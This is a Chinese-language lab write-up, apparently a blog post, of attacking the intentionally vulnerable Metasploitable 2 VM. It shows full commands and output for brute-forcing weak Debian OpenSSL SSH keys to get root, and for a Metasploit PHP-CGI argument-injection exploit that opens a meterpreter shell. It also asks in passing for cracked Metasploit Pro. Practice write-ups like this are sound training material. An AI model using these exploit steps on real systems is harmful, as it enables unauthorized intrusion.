metasploitable 2 测试笔记

简介: metasploitable 2 c4rp3nt3r 测试笔记最近metasploit发布了metasploitable 2,作为一个练习用的linux操作系统.

metasploitable 2 c4rp3nt3r 测试笔记

最近metasploit发布了metasploitable 2,作为一个练习用的linux操作系统. 采用Ubuntu 8.04的OS,搭配各种漏洞,正好满足了广大穷屌丝日益增长的装X和意淫需求.
下载地址: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
metasploit官方的用户指南,详见: https://community.rapid7.com/docs/DOC-1875

孤陋寡闻的我原来没有玩过这么高级的东西,就下载回来测试了下一把.
操起nmap 和 nessus一阵狂扫发现N多服务N多高危漏洞.


metasploitable就好比一道练习题,做题当然要捡自己掌握不好的来做,否则失去做题的意义了.很多一击必中的漏洞和后门都没多大意思,我们对结果不太确定的东西感兴趣.先看看22端口扫描出的漏洞.

Debian OpenSSH/OpenSSL Package Random Number Generator Weakness CVE-2008-0166

既然是metasploitable那么就请metasploit出马吧

搜一下有木有exp

msf > search cve:2008-0166

msf >

尼玛,这个真木有,估计metasploit pro应该有这个exp吧,穷屌丝哪有钱买那个,谁有破解的,真心求.
我擦,穷屌丝只好搜搜exploit-db了.本地搜索的话可以先svn update一下.

1 root@bt:/pentest/exploits/exploitdb# ./searchsploit openssl
2  Description                                                                 Path
3  --------------------------------------------------------------------------- -------------------------
4  Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
5  Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
6  OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
7  Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
8  Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
9  Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
10  OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
11  OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
12  OpenSSL remote DoS                                                          /linux/dos/12334.c
13  OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt

挑一个python的exp,打开瞧瞧,就会发现贴心的用法

1 # Autor: hitz - WarCat team (warcat.no-ip.org)
2  # Collaborator: pretoriano
3  #
5  #
6  # 2. Extract it to a directory
7  #
8  # 3. Execute the python script
9  #     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
10  #     - execute: python exploit.py (without parameters) to display the help
11  #     - if the key is found, the script shows something like that:
12  #         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
13  #          Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240

好吧开干

1 下载私钥
3 解压之
4 tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
5 运行exploit尝试私钥登录
6 root@bt:~/Desktop# python 5720.py 
7   
8 -OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
9 ./exploit.py <dir> <host> <user> [[port] [threads]]
10     <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
11     <host>: The victim host
12     <user>: The user of the victim host
13     [port]: The SSH port of the victim host (default 22)
14     [threads]: Number of threads (default 4) Too big numer is bad
15 root@bt:~/Desktop# python 5720.py ~/Desktop/rsa/2048/ 192.168.1.103 root

等到花儿谢了之后,发现成功了

赶紧试一试.

1 root@bt:~/Desktop# ssh -lroot -p22 -i /root/Desktop/rsa/2048//57c3115d77c56390332dc5c49978627a-5429 192.168.1.103
2 Last login: Thu Jun 21 21:06:33 2012 from 192.168.1.100
3 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
4   
5 The programs included with the Ubuntu system are free software;
6 the exact distribution terms for each program are described in the
7 individual files in /usr/share/doc/*/copyright.
8   
9 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
10 applicable law.
11   
12 To access official Ubuntu documentation, please visit:
13   
15   
16 You have new mail.
17 root@metasploitable:~# id
18 uid=0(root) gid=0(root) groups=0(root)
19 root@metasploitable:~#


我勒个去,真登录进去了,这尼玛太也容易了.

继续看看吧,别人公布的利用方法咱就不看了.
看看web目录有些什么菜吧.有一个存在漏洞的的phpMyAdmin.还有一套wiki程序以及一些专门练习web漏洞用的Mutillidae和DVWA.


练习用的太简单了咱就不玩了,TWiki也不好玩,mysql的密码前面nessus已经扫描出来了,web程序也不好玩.扫扫目录看有什么东西没有.
找一个轻量级的perl程序随便扫扫先.结果如下

1 ++++++++++++++++++++++++++++++++++++
2 [+] Exists ->http://192.168.1.103/index.php 200 OK
3 [+] Found ->http://192.168.1.103/phpinfo.php 200 OK
4 [+] Found ->http://192.168.1.103/phpMyAdmin 200 OK
5 [-] Forbidden ->http://192.168.1.103/server-status 403 Forbidden
6 [+] Exists ->http://192.168.1.103/.bash_history 200 OK
7 [-] Forbidden ->http://192.168.1.103/cgi-bin/ 403 Forbidden
8 ++++++++++++++++++++++++++++++++++++

看看phpinfo.php吧.某国际黑客说除了phpinfo.php啥都没有,其实有时候一个phpinfo.php足够拿个shell了.
看了下是cgi方式运行的php,访问


尼玛这不是那个谁吗,PHP CGI Argument Injection 漏洞啊

这次再请出metasploit出场,你是主角啊,给点力行不?

1 msf > search cve:2012-1823
2   
3 Matching Modules
4 ================
5   
6    Name                                      Disclosure Date  Rank       Description
7    ----                                      ---------------  ----       -----------
8    exploit/multi/http/php_cgi_arg_injection  2012-05-03       excellent  PHP CGI Argument Injection
9   
10 msf >

这次真有了,好吧metasploit时间到了

1 msf  exploit(php_cgi_arg_injection) > use exploit/multi/http/php_cgi_arg_injection
2 msf  exploit(php_cgi_arg_injection) > set RHOST 192.168.1.103
3 RHOST => 192.168.1.103
4 msf  exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php
5 TARGETURI => /phpinfo.php
6 msf  exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp
7 PAYLOAD => php/meterpreter/bind_tcp
8 msf  exploit(php_cgi_arg_injection) > exploit 
9   
10 [*] Started bind handler
11 [*] Sending stage (39217 bytes) to 192.168.1.103
12 [*] Meterpreter session 1 opened (192.168.1.100:35125 -> 192.168.1.103:4444) at 2012-06-22 11:38:21 +0800
13   
14 meterpreter > pwd
15 /var/www
16 meterpreter > getuid
17 Server username: www-data (33)
18 meterpreter >


好吧用metasploit成功了一次.总算没白叫metasploitable.

之后又测试了里面的web漏洞,没什么意思就不写了.啥时候国人搞一个类似的系统呢?放上国产的cms,别放那么多溢出和弱口令,搞个游戏或者竞赛其实挺好玩的.

目录
相关文章
|
5月前
|
架构师 测试技术 网络性能优化
dpdk课程学习之练习笔记七(vpp环境搭建及plugin demo测试)
dpdk课程学习之练习笔记七(vpp环境搭建及plugin demo测试)
467 0
|
5月前
|
缓存 网络协议 Ubuntu
dpdk课程学习之练习笔记一(接收,发送,arp,icmp功能测试)
dpdk课程学习之练习笔记一(接收,发送,arp,icmp功能测试)
144 0
|
5月前
|
存储 缓存 网络协议
dpdk课程学习之练习笔记二(arp, udp协议api测试)
dpdk课程学习之练习笔记二(arp, udp协议api测试)
156 0
|
23天前
|
缓存 Java 测试技术
谷粒商城笔记+踩坑(11)——性能压测和调优,JMeter压力测试+jvisualvm监控性能+资源动静分离+修改堆内存
使用JMeter对项目各个接口进行压力测试,并对前端进行动静分离优化,优化三级分类查询接口的性能
谷粒商城笔记+踩坑(11)——性能压测和调优,JMeter压力测试+jvisualvm监控性能+资源动静分离+修改堆内存
|
29天前
|
人工智能 测试技术 PyTorch
AI计算机视觉笔记二十四:YOLOP 训练+测试+模型评估
本文介绍了通过正点原子的ATK-3568了解并实现YOLOP(You Only Look Once for Panoptic Driving Perception)的过程,包括训练、测试、转换为ONNX格式及在ONNX Runtime上的部署。YOLOP由华中科技大学团队于2021年发布,可在Jetson TX2上达到23FPS,实现了目标检测、可行驶区域分割和车道线检测的多任务学习。文章详细记录了环境搭建、训练数据准备、模型转换和测试等步骤,并解决了ONNX转换过程中的问题。
|
29天前
|
人工智能 计算机视觉
AI计算机视觉笔记十五:编写检测的yolov5测试代码
该文为原创文章,如需转载,请注明出处。本文作者在成功运行 `detect.py` 后,因代码难以理解而编写了一个简易测试程序,用于加载YOLOv5模型并检测图像中的对象,特别是“人”类目标。代码实现了从摄像头或图片读取帧、进行颜色转换,并利用YOLOv5进行推理,最后将检测框和置信度绘制在输出图像上,并保存为 `result.jpg`。如果缺少某些模块,可使用 `pip install` 安装。如涉及版权问题或需获取完整代码,请联系作者。
|
29天前
|
机器学习/深度学习 人工智能 文字识别
AI计算机视觉笔记二十:PaddleOCR环境搭建及测试
OCR技术广泛应用于日常生活中,与人脸识别一样常见。PaddleOCR是一个基于飞桨的OCR工具库,具有超轻量级中文OCR模型,支持中英文数字组合、竖排及长文本识别。本文档详细介绍了PaddleOCR的学习过程,包括环境搭建、安装、样本标注及测试步骤。使用AutoDL云平台进行环境创建,并提供了详细的命令行操作指南,帮助用户顺利完成PaddleOCR的部署与测试。
|
1月前
|
机器学习/深度学习 人工智能 数据处理
AI计算机视觉笔记六:mediapipe测试
MediaPipe是由Google Research开发并开源的多媒体机器学习框架,已被集成到YouTube、Google Lens等重要产品中。该框架支持多种功能,如物体检测、自拍分割、头发分割、人脸检测、手部检测及运动追踪等。本文档将指导你通过Python环境搭建与测试MediaPipe,包括创建虚拟环境、安装依赖库,并进行手指骨骼识别测试。具体步骤涵盖环境配置、摄像头数据处理及结果显示。
|
1月前
|
人工智能 PyTorch 算法框架/工具
AI计算机视觉笔记十四:YOLOV5环境搭建及测试全过程
本文详细记录了在Windows 10环境下从零开始搭建yolov5环境并进行测试的全过程,涵盖环境配置、依赖安装及模型测试等关键步骤。文章首先介绍了所需环境(Python 3.8、yolov5-5.0),接着详细说明了如何使用Miniconda3创建与激活虚拟环境,并通过具体命令演示了如何下载安装yolov5及相关依赖库。最后,通过一系列命令展示了如何下载预训练模型并对示例图像进行目标检测,同时解决了一些常见错误。适合初学者跟随实践。如需转载,请注明原文出处。
|
4月前
|
机器人 定位技术 C++
技术笔记:ROS中测试机器人里程计信息
技术笔记:ROS中测试机器人里程计信息
下一篇
无影云桌面